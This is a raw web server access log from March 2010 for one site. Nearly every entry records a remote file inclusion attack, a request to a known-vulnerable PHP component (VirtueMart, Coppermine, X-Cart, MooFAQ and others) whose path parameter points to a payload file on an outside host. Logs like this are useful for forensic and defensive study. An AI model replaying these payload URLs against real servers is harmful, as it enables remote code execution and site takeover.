201.28.110.99 - - [08/Mar/2010:00:52:12 -0800] "GET /logs///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:00:53:25 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
213.165.84.131 - - [08/Mar/2010:00:54:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
213.165.84.131 - - [08/Mar/2010:00:54:18 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
213.165.84.131 - - [08/Mar/2010:00:54:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
61.213.96.39 - - [08/Mar/2010:00:55:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.vspeaking.com"
118.168.13.251 - - [08/Mar/2010:00:57:44 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.194 - - [08/Mar/2010:00:57:44 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.194 - - [08/Mar/2010:00:57:44 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.94 - - [08/Mar/2010:00:58:13 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.94 - - [08/Mar/2010:00:58:13 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.122 - - [08/Mar/2010:00:58:14 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.13.251 - - [08/Mar/2010:00:59:14 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.183 - - [08/Mar/2010:00:59:14 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.194 - - [08/Mar/2010:00:59:14 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:03:47 -0800] "GET /logs//include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:03:50 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:03:52 -0800] "GET /include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:06:03 -0800] "GET /logs/solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:06:03 -0800] "GET /logs/access.log%20%20/solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:06:03 -0800] "GET /solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:08:09 -0800] "GET /logs/access.log/solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:09:24 -0800] "GET /solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:09:24 -0800] "GET /logs/access.log/solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:09:29 -0800] "GET /logs/solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:14:35 -0800] "GET /logs/access_100118.log/solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
190.152.217.250 - - [08/Mar/2010:01:16:52 -0800] "GET /logs/access_100118.log/solpot.html?body=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
66.216.127.211 - - [08/Mar/2010:01:17:39 -0800] "GET /admin/auth.php?xcart_dir=http://alice-t.dk/cache/tpl_fisubsilversh.admin.auth_forum_body.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
66.216.127.211 - - [08/Mar/2010:01:17:39 -0800] "GET /logs//admin/auth.php?xcart_dir=http://alice-t.dk/cache/tpl_fisubsilversh.admin.auth_forum_body.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
88.84.95.167 - - [08/Mar/2010:01:17:45 -0800] "GET /logs//admin/auth.php?xcart_dir=http://alice-t.dk/cache/tpl_fisubsilversh.admin.auth_forum_body.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.vspeaking.com"
88.84.95.167 - - [08/Mar/2010:01:17:45 -0800] "GET /admin/auth.php?xcart_dir=http://alice-t.dk/cache/tpl_fisubsilversh.admin.auth_forum_body.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.vspeaking.com"
208.77.223.114 - - [08/Mar/2010:01:18:42 -0800] "GET /admin/auth.php?xcart_dir=http://alice-t.dk/cache/tpl_fisubsilversh.admin.auth_forum_body.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
208.77.223.114 - - [08/Mar/2010:01:18:42 -0800] "GET /logs//admin/auth.php?xcart_dir=http://alice-t.dk/cache/tpl_fisubsilversh.admin.auth_forum_body.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:25:55 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:25:55 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:25:55 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
77.120.104.120 - - [08/Mar/2010:01:33:19 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
77.120.104.120 - - [08/Mar/2010:01:33:19 -0800] "GET /skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
77.120.104.120 - - [08/Mar/2010:01:33:19 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
122.201.102.68 - - [08/Mar/2010:01:35:28 -0800] "GET /logs/access.log//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
122.201.102.68 - - [08/Mar/2010:01:35:28 -0800] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
122.201.102.68 - - [08/Mar/2010:01:35:28 -0800] "GET /include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
122.201.102.68 - - [08/Mar/2010:01:35:30 -0800] "GET /include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
122.201.102.68 - - [08/Mar/2010:01:35:30 -0800] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
122.201.102.68 - - [08/Mar/2010:01:35:30 -0800] "GET /logs/access.log//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:35:31 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:35:35 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:35:40 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:38:34 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:38:34 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:38:44 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:39:45 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:39:45 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:39:45 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:47:18 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:47:18 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:47:18 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:47:18 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:47:18 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:47:23 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:47:58 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:48:04 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:48:04 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.132.3 - - [08/Mar/2010:01:49:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.132.3 - - [08/Mar/2010:01:49:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.132.3 - - [08/Mar/2010:01:49:26 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:49:38 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:49:38 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
201.28.110.99 - - [08/Mar/2010:01:49:38 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:01:50:44 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:01:50:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:01:50:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:54:03 -0800] "GET /logs//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:54:04 -0800] "GET /atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:54:13 -0800] "GET /logs//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:54:14 -0800] "GET /atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:54:14 -0800] "GET /logs/access.log%20%20//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:54:20 -0800] "GET /logs/access.log//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:54:58 -0800] "GET /logs/access.log%20%20//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
87.224.132.89 - - [08/Mar/2010:01:55:40 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:01:55:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:01:55:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:56:16 -0800] "GET /atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:56:16 -0800] "GET /logs/access.log//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:56:16 -0800] "GET /logs//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:56:46 -0800] "GET /logs//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:56:46 -0800] "GET /logs/access.log//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:56:46 -0800] "GET /logs/access.log//atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:01:56:47 -0800] "GET /atom.php5?page=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:57:36 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:57:36 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
189.108.172.26 - - [08/Mar/2010:01:57:36 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.13.251 - - [08/Mar/2010:02:11:56 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.122 - - [08/Mar/2010:02:11:56 -0800] "GET /logs/access.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.152 - - [08/Mar/2010:02:11:56 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.250.255.243 - - [08/Mar/2010:02:13:37 -0800] "GET /logs/access.log HTTP/1.1" 200 120300 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:02:25:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:02:25:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:02:25:18 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
216.119.103.12 - - [08/Mar/2010:02:41:38 -0800] "GET /write_update.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
216.119.103.12 - - [08/Mar/2010:02:41:38 -0800] "GET /logs//write_update.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
216.119.103.12 - - [08/Mar/2010:02:41:38 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:42:12 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:42:12 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:42:12 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:01 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:01 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:01 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:12 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:13 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:13 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:34 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:34 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:46:34 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:48:05 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
